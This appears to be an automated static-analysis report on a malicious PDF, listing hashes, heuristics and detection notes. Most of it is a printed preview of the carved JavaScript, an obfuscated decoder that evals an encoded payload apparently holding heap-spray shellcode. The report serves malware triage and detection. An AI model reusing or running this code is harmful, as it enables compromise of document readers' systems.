Malicious PDF — malware analysis report

Static analysis result for SHA-256 d049423ace0f5b22…

MALICIOUS

PDF

9.3 KB Created: 2010-05-23 12:56:51 Authoring application: EfBFPN (via j5zphbj) First seen: 2026-05-08
MD5: 718d69a7316cdacf0a00f0a0ca81b2c0 SHA-1: 6ddfe4c1acbaba9ee637346d51aa0920fe6c2c4b SHA-256: d049423ace0f5b22d2fcf76103b1dd587c1a517c92c59a567c967c09536db864
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

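The PDF file contains embedded JavaScript, as indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic fired, which suggests the use of eval(), a common technique for obfuscating malicious JavaScript; PDF_EVAL is not itemised in the heuristics list below, where the eval-related evidence appears under PDF_JS_EXPLOIT_CLUSTER. The embedded JavaScript is likely designed to download and execute a second-stage payload, although this is inferred from static indicators; the report shows no dynamic execution results. The findings shown involve PDF-embedded JavaScript and no PowerShell artefact, so the T1059.001 mapping above is not corroborated by the evidence on this page. The obfuscation and use of eval() reduce confidence in a precise family attribution.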

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    SG<GYB,=,}Bf<hYmfy\"%}4o4o%}4o4o\"g;\n,,FqmjKifq6(SG<GYB,=,LBlN6)FGc<Fws)4EyFqmjKifq6(SG<GYB>,aEmh2DW< ICd<c{hg;\n,,6YR,21W(jhvYRJi4EJas,=,ymIl.FNTTrdS0qsAW,-,orQooooog,/,MLRSBRSF1jPr7E 5;\n,,eER,y6YR,9.C(vP0F 10dW7G2,=,o;,9.C(vP0F 10dW7G2,n,21W(jhvYRJi4EJas;,9.C(vP0F 10dW7G2,++,gk\n,,,,ELsPOSwptB48ToG([9.C(vP0F 10dW7G2],=,FqmjKifq6(SG<GYB,+, wRSQOGUqKpD0ZDv;\n,,3\n3\ne}BhGpEB,ewV<se GeJNvJjWMygk\n,,6YR,fEOOM8mBaqAp<VKW,=,o;\n,,6YR,D1.)N8PuRxKRLul.,=,Ymmz6pfUfRWfR<pEBzGE GRpBuyg;\n,,Ymmzh0fYRvpL …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x241 8102 bytes
SHA-256: aefd33dca28b5b4554b09ef78bca5006d7b280a202e3382878b3edd158e5b6dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
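Carved artifact contains 1 eval/decoder/string-building token(s). 63 of 112 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation. Note that the quoted example matches part of the decoder's alphabet string literal in the preview rather than an identifier, so the 63-of-112 count may include string contents as well as names.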
Preview script
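First 1,000 lines of the extracted script. The preview is a decoder stub rather than the final script: RkNDhq() maps each character of the long string qIoxD through a fixed one-to-one substitution table built from two lookup strings (characters not in the table pass through unchanged), the loop concatenates the result, and the decoded text is handed to eval(). The /*…*/ comments contain random filler. The second-stage logic is therefore readable only after applying the substitution offline, without calling eval(). Line breaks inside the quoted string appear to be display wrapping, so the preview is not byte-identical to the artifact hashed above.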
function sTGjLz8n(sTGjLz8n,AAJayE) {var lVBW70NH14Qgs=sTGjLz8n. substr (AAJayE, 1);return lVBW70NH14Qgs;}/*LpyorNgGB5|SUOXxu8JvVGm|OedfALzL0o0h1W*/function RkNDhq(A9zNF) {/*ASILmXiaHhj32qf|A94aAGQM74Cf|ZIorRzUoYuv5UoyBK*/var wBAl6RpGbWkaIpBGnIY = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*AKKXKQoWN[ZsVy1AfI0zxOkj]AO86YO3*//*YQto5G2efkzTc0|lqoY4P8FJMDGkR9JpQ|ULANqfygzQWo2CTR7iP*/var WbvCevCT /*sbGzC[yMDFFYQGl7l]dbq0Gj3a019*/= new String("nbygk3,z>KValjI7AC{XM1H.wc2 vdWPixDYqh)feu9p(F0LBEm8R<G}6UrtToJNsQ5OZS4");/*AshAhj|Vwca10r7cpj|JBj9IJ2i9uiFoQmoxMD*/for(HMvJNWGeCM6ZwXhbYoFh=0;HMvJNWGeCM6ZwXhbYoFh<wBAl6RpGbWkaIpBGnIY.length;HMvJNWGeCM6ZwXhbYoFh++) {if(A9zNF == sTGjLz8n(WbvCevCT, HMvJNWGeCM6ZwXhbYoFh)) {/*Afk0WSy[AXsGZSGhb9GatpfX5I]sUG2S*/return sTGjLz8n(wBAl6RpGbWkaIpBGnIY, HMvJNWGeCM6ZwXhbYoFh);/*cJ8u7xsVfyuy5S <AZpnELBA]EsnKk6wDF*/}}return A9zNF;}/*xCifYEUI2PbHJ1xx5[z5S3o5EP20S8lGBKmZO6]HM9PW0CKwB9sT*//*XP7nIx5GZCHjohylF5y|KK5NVs|UbjNyzLb*/var YXYg9dBVxDvg2gulz1K = new String;var qIoxD = new String("\n6YR,ELsPOSwptB48ToG(,=,BfU,KRRYtyg;\n6YR,UZ JWD9wc.5Pt40u;\ne}BhGpEB,LBlN6)FGc<Fws)4EyFqmjKifq6(SG<GYB>,aEmh2DW< ICd<c{hgk\n,,U9p0f,yFqmjKifq6(SG<GYBz0fBuG9,*,N,n,aEmh2DW< ICd<c{hgk\n,,,,FqmjKifq6(SG<GYB,+=,FqmjKifq6(SG<GYB;\n,,3\n,,FqmjKifq6(SG<GYB,=,FqmjKifq6(SG<GYBz<}q<GRpBuyo>,aEmh2DW< ICd<c{h,/,Ng;\n,,RfG}RB,FqmjKifq6(SG<GYB;\n3\ne}BhGpEB,64RleWEqj6WSEZ6Wy0FSMX)jLGPA0rY.Tgk\n,,6YR,mIl.FNTTrdS0qsAW,=,orohohohoh;\n,,6YR, 
wRSQOGUqKpD0ZDv,=,}Bf<hYmfy\"%}QsQs%}QsQs%}QsQs%}oIjV%}ss5V%}OOa4%}SoV4%}SooJ%}jIss%}jNQs%}jVIK%}jSo5%}IIja%}IIII%}SVZI%}lIQj%}jIjI%}OQjI%}jsKI%}4IOQ%}QNIs%}4IOQ%}OjjZ%}jIos%}jIjV%}OQjI%}V4os%}OJSZ%}jJKJ%}oZos%}jIJJ%}jIjI%}KKOO%}V4jV%}ZZSZ%}O5JJ%}oZjJ%}jIJI%}jIjI%}KKOO%}V4jZ%}aKSZ%}Jo5I%}oZNl%}jIol%}jIjI%}KKOO%}V4js%}ooSZ%}oINJ%}oZSI%}jIsV%}jIjI%}KKOO%}V4II%}NjSZ%}oK4O%}oZ5Z%}jIN4%}jIjI%}KKOO%}KIIV%}lZOI%}4KNa%}OOJ5%}IZKK%}jSoO%}jIjj%}VJjI%}4KOO%}OQaV%}jVKK%}jjS5%}OQVO%}IZVK%}oZV4%}jIOQ%}jIjI%}SZVI%}I5l4%}4Iao%}ZSoZ%}jIjI%}OOjI%}IsKK%}NKOQ%}NIOa%}OOVI%}aIKK%}JoSZ%}jIjI%}VIjI%}KKOQ%}S5IV%}VOjl%}VKOQ%}oZIZ%}jISj%}jIjI%}KKja%}NSaI%}VsjI%}aJ4J%}NSSK%}jVKI%}SK4Z%}jIjI%}4KJo%}OQaI%}jsKK%}jjS5%}OQVO%}IZVK%}KIoZ%}jIjI%}S5jI%}VZjS%}KKja%}laaV%}VasQ%}JoVa%}aI4K%}VaVI%}KKOQ%}S5Is%}VOjK%}VKOQ%}oZIZ%}jIaa%}jIjI%}jIS5%}4KJo%}OQaI%}jZKK%}jlS5%}OQVO%}IZVK%}IIoZ%}jIjI%}S5jI%}OQJo%}IIKK%}jjS5%}OQVO%}IZVK%}jIoZ%}jIjI%}KjjI%}VlVQ%}ojja%}ojja%}ojja%}ojja%}osOa%}V5jV%}OQVa%}ols5%}VlJS%}oIJo%}OQVK%}OQos%}jZ4N%}VNOQ%}V4js%}4aOQ%}OQls%}IJ4V%}ja4Z%}V4Ja%}44OQ%}jaaI%}laJa%}KONO%}QNKj%}Naja%}laV4%}joJ4%}II5J%}Jll5%}jZ4V%}NJNj%}jajN%}KIJl%}JjoQ%}JJlQ%}4KVJ%}V5oK%}oQOQ%}V5OQ%}jaaV%}S4sN%}jsOQ%}OQKQ%}IsV5%}sNja%}jVOQ%}jaOQ%}VJNK%}NlVN%}jIjZ%}JVoZ%}JoJJ%}VKJo%}KsVl%}KoKN%}jIKJ%}ZQOS%}ZoZQ%}NIsK%}OQNI%}Olso%}sJOJ%}ZsOj%}O4Nj%}OOOj%}NIOI%}OaON%}OZOI%}OaNI%}OJOI%}NjOQ%}OSZo%}sIZo%}OQO4%}s4sl%}oos4\"g;\n,,pe,y0FSMX)jLGPA0rY.T,==,Jgk\n,,,,mIl.FNTTrdS0qsAW,=,orsosososo;\n,,,, 
wRSQOGUqKpD0ZDv,=,}Bf<hYmfy\"%}QsQs%}QsQs%}QsQs%}oIjV%}ss5V%}OOa4%}SoV4%}SooJ%}jIss%}jNQs%}jVIK%}jSo5%}IIja%}IIII%}SVZI%}lIQj%}jIjI%}OQjI%}jsKI%}4IOQ%}QNIs%}4IOQ%}OjjZ%}jIos%}jIjV%}OQjI%}V4os%}OJSZ%}jJKJ%}oZos%}jIJJ%}jIjI%}KKOO%}V4jV%}ZZSZ%}O5JJ%}oZjJ%}jIJI%}jIjI%}KKOO%}V4jZ%}aKSZ%}Jo5I%}oZNl%}jIol%}jIjI%}KKOO%}V4js%}ooSZ%}oINJ%}oZSI%}jIsV%}jIjI%}KKOO%}V4II%}NjSZ%}oK4O%}oZ5Z%}jIN4%}jIjI%}KKOO%}KIIV%}lZOI%}4KNa%}OOJ5%}IZKK%}jSoO%}jIjj%}VJjI%}4KOO%}OQaV%}jVKK%}jjS5%}OQVO%}IZVK%}oZV4%}jIOQ%}jIjI%}SZVI%}I5l4%}4Iao%}ZSoZ%}jIjI%}OOjI%}IsKK%}NKOQ%}NIOa%}OOVI%}aIKK%}JoSZ%}jIjI%}VIjI%}KKOQ%}S5IV%}VOjl%}VKOQ%}oZIZ%}jISj%}jIjI%}KKja%}NSaI%}VsjI%}aJ4J%}NSSK%}jVKI%}SK4Z%}jIjI%}4KJo%}OQaI%}jsKK%}jjS5%}OQVO%}IZVK%}KIoZ%}jIjI%}S5jI%}VZjS%}KKja%}laaV%}VasQ%}JoVa%}aI4K%}VaVI%}KKOQ%}S5Is%}VOjK%}VKOQ%}oZIZ%}jIaa%}jIjI%}jIS5%}4KJo%}OQaI%}jZKK%}jlS5%}OQVO%}IZVK%}IIoZ%}jIjI%}S5jI%}OQJo%}IIKK%}jjS5%}OQVO%}IZVK%}jIoZ%}jIjI%}KjjI%}VlVQ%}ojja%}ojja%}ojja%}ojja%}osOa%}V5jV%}OQVa%}ols5%}VlJS%}oIJo%}OQVK%}OQos%}jZ4N%}VNOQ%}V4js%}4aOQ%}OQls%}IJ4V%}ja4Z%}V4Ja%}44OQ%}jaaI%}laJa%}KONO%}QNKj%}Naja%}laV4%}joJ4%}II5J%}Jll5%}jZ4V%}NJNj%}jajN%}KIJl%}JjoQ%}JJlQ%}4KVJ%}V5oK%}oQOQ%}V5OQ%}jaaV%}S4sN%}jsOQ%}OQKQ%}IsV5%}sNja%}jVOQ%}jaOQ%}VJNK%}NlVN%}jIjZ%}JVoZ%}JoJJ%}VKJo%}KsVl%}KoKN%}jIKJ%}ZQOS%}ZoZQ%}NIsK%}OQNI%}Olso%}sJOJ%}ZsOj%}O4Nj%}OOOj%}NIOI%}OaON%}OZOI%}OaNI%}OJOI%}NjOQ%}OSZo%}sIZo%}OQO4%}s4sl%}oos4\"g;\n,,3\n,,f0<f,pe,y0FSMX)jLGPA0rY.T,==,Ngk\n,,,, 
wRSQOGUqKpD0ZDv,=,}Bf<hYmfy\"%}QsQs%}QsQs%}QsQs%}oIjV%}ss5V%}OOa4%}SoV4%}SooJ%}jIss%}jNQs%}jVIK%}jSo5%}IIja%}IIII%}SVZI%}lIQj%}jIjI%}OQjI%}jsKI%}4IOQ%}QNIs%}4IOQ%}OjjZ%}jIos%}jIjV%}OQjI%}V4os%}OJSZ%}jJKJ%}oZos%}jIJJ%}jIjI%}KKOO%}V4jV%}ZZSZ%}O5JJ%}oZjJ%}jIJI%}jIjI%}KKOO%}V4jZ%}aKSZ%}Jo5I%}oZNl%}jIol%}jIjI%}KKOO%}V4js%}ooSZ%}oINJ%}oZSI%}jIsV%}jIjI%}KKOO%}V4II%}NjSZ%}oK4O%}oZ5Z%}jIN4%}jIjI%}KKOO%}KIIV%}lZOI%}4KNa%}OOJ5%}IZKK%}jSoO%}jIjj%}VJjI%}4KOO%}OQaV%}jVKK%}jjS5%}OQVO%}IZVK%}oZV4%}jIOQ%}jIjI%}SZVI%}I5l4%}4Iao%}ZSoZ%}jIjI%}OOjI%}IsKK%}NKOQ%}NIOa%}OOVI%}aIKK%}JoSZ%}jIjI%}VIjI%}KKOQ%}S5IV%}VOjl%}VKOQ%}oZIZ%}jISj%}jIjI%}KKja%}NSaI%}VsjI%}aJ4J%}NSSK%}jVKI%}SK4Z%}jIjI%}4KJo%}OQaI%}jsKK%}jjS5%}OQVO%}IZVK%}KIoZ%}jIjI%}S5jI%}VZjS%}KKja%}laaV%}VasQ%}JoVa%}aI4K%}VaVI%}KKOQ%}S5Is%}VOjK%}VKOQ%}oZIZ%}jIaa%}jIjI%}jIS5%}4KJo%}OQaI%}jZKK%}jlS5%}OQVO%}IZVK%}IIoZ%}jIjI%}S5jI%}OQJo%}IIKK%}jjS5%}OQVO%}IZVK%}jIoZ%}jIjI%}KjjI%}VlVQ%}ojja%}ojja%}ojja%}ojja%}osOa%}V5jV%}OQVa%}ols5%}VlJS%}oIJo%}OQVK%}OQos%}jZ4N%}VNOQ%}V4js%}4aOQ%}OQls%}IJ4V%}ja4Z%}V4Ja%}44OQ%}jaaI%}laJa%}KONO%}QNKj%}Naja%}laV4%}joJ4%}II5J%}Jll5%}jZ4V%}NJNj%}jajN%}KIJl%}JjoQ%}JJlQ%}4KVJ%}V5oK%}oQOQ%}V5OQ%}jaaV%}S4sN%}jsOQ%}OQKQ%}IsV5%}sNja%}jVOQ%}jaOQ%}VJNK%}NlVN%}jIjZ%}JVoZ%}JoJJ%}VKJo%}KsVl%}KoKN%}jIKJ%}ZQOS%}ZoZQ%}NIsK%}OQNI%}Olso%}sJOJ%}ZsOj%}O4Nj%}OOOj%}NIOI%}OaON%}OZOI%}OaNI%}OJOI%}NjOQ%}OSZo%}sIZo%}OQO4%}s4sl%}oos4\"g;\n,,3\n,,6YR,MLRSBRSF1jPr7E 5,=,orQooooo;\n,,6YR,U{V7wOlN76YNsoW.,=, wRSQOGUqKpD0ZDvz0fBuG9,*,N;\n,,6YR,aEmh2DW< ICd<c{h,=,MLRSBRSF1jPr7E 5,-,yU{V7wOlN76YNsoW.,+,orsSg;\n,,6YR,FqmjKifq6(SG<GYB,=,}Bf<hYmfy\"%}4o4o%}4o4o\"g;\n,,FqmjKifq6(SG<GYB,=,LBlN6)FGc<Fws)4EyFqmjKifq6(SG<GYB>,aEmh2DW< ICd<c{hg;\n,,6YR,21W(jhvYRJi4EJas,=,ymIl.FNTTrdS0qsAW,-,orQooooog,/,MLRSBRSF1jPr7E 5;\n,,eER,y6YR,9.C(vP0F 10dW7G2,=,o;,9.C(vP0F 10dW7G2,n,21W(jhvYRJi4EJas;,9.C(vP0F 10dW7G2,++,gk\n,,,,ELsPOSwptB48ToG([9.C(vP0F 10dW7G2],=,FqmjKifq6(SG<GYB,+, wRSQOGUqKpD0ZDv;\n,,3\n3\ne}BhGpEB,ewV<se 
GeJNvJjWMygk\n,,6YR,fEOOM8mBaqAp<VKW,=,o;\n,,6YR,D1.)N8PuRxKRLul.,=,Ymmz6pfUfRWfR<pEBzGE GRpBuyg;\n,,Ymmzh0fYRvpLf.}GyUZ JWD9wc.5Pt40ug;\n\n,,pe,yD1.)N8PuRxKRLul.,n,ZzJgk\n,,,,64RleWEqj6WSEZ6Wyog;\n,,,,6YR,eCvmo{hM6}5BZI{9,=,}Bf<hYmfy\"%}ohoh%}ohoh\"g;\n,,,,U9p0f,yeCvmo{hM6}5BZI{9z0fBuG9,n,QQ45NgeCvmo{hM6}5BZI{9,+=,eCvmo{hM6}5BZI{9;\n,,,,G9p<,zhE00Yq GERf,=,aE00YqzhE00fhGjLYp0CBeEyk\n,,,,,,<}q(,:,\"\">,L<u,:,eCvmo{hM6}5BZI{9\n,,,,3\n,,,,g;\n,,3\npe,yD1.)N8PuRxKRLul.,b=,4gk\n,,,,GRt,k\npe,yYmmz)EhzaE00YqzufGChEBgk\n,,,,,,,,64RleWEqj6WSEZ6WyNg;\n,,,,,,,,6YR,E9Xhi8{.wv7VKvDf,=,}Bf<hYmfy\"%o4\"g;\n,,,,,,,,U9p0f,yE9Xhi8{.wv7VKvDfz0fBuG9,n,orQooogE9Xhi8{.wv7VKvDf,+=,E9Xhi8{.wv7VKvDf;\n,,,,,,,,E9Xhi8{.wv7VKvDf,=,\"Hz\",+,E9Xhi8{.wv7VKvDf;\nYmmz)EhzaE00YqzufGChEByE9Xhi8{.wv7VKvDfg;\n,,,,,,,,fEOOM8mBaqAp<VKW,=,J;\n,,,,,,3\n,,,,,,f0<f,k\n,,,,,,,,fEOOM8mBaqAp<VKW,=,J;\n,,,,,,3\n,,,,3\n,,,,hYGh9,yfgk\n,,,,,,fEOOM8mBaqAp<VKW,=,J;\n,,,,3\n,,,,pe,yfEOOM8mBaqAp<VKW,==,Jgk\n,,,,,,pe,yyD1.)N8PuRxKRLul.,b=,ZzJ&&,D1.)N8PuRxKRLul.,n,4ggk\n,,,,,,,,64RleWEqj6WSEZ6WyJg;\n,,,,,,,,6YR,jQd6HSACsMO4q.8l,=,\"JN444444444444444444\";\n,,,,,,,,eER,y1K8)Nosc)CqBLV D,=,o;,1K8)Nosc)CqBLV D,n,NZO;,1K8)Nosc)CqBLV D,++,gk\n,,,,,,,,,,jQd6HSACsMO4q.8l,+=,\"S\";\n,,,,,,,,3\n,,,,,,,,}Gp0zmRpBGey\"%Q5oooe\">,jQd6HSACsMO4q.8lg;\n,,,,,,3\n,,,,3\n,,3\n3\nYmmz.rdq50GSSTIpHZU ,=,ewV<se GeJNvJjWM;\nUZ JWD9wc.5Pt40u,=,Ymmz<fGvpLf.}Gy\"Ymmz.rdq50GSSTIpHZU yg\">,Jog;\n");/*AXEYaM8Etwqyse33ozGA{WU95ixutPssnx}D9FIs2*//*hkSad7Pj7x6Rw10km|AVSdIZgHfo0XdX|vyasEAq168oyyOaYEvqi*/for(AddBZ2YxYYRZuEc=0;AddBZ2YxYYRZuEc<qIoxD.length;AddBZ2YxYYRZuEc++)YXYg9dBVxDvg2gulz1K += RkNDhq(sTGjLz8n(qIoxD,AddBZ2YxYYRZuEc));eval(YXYg9dBVxDvg2gulz1K);/*GFBlu28NQ68EWrIXXAT[pHJ3ii8TOh]VmP6WI5j*/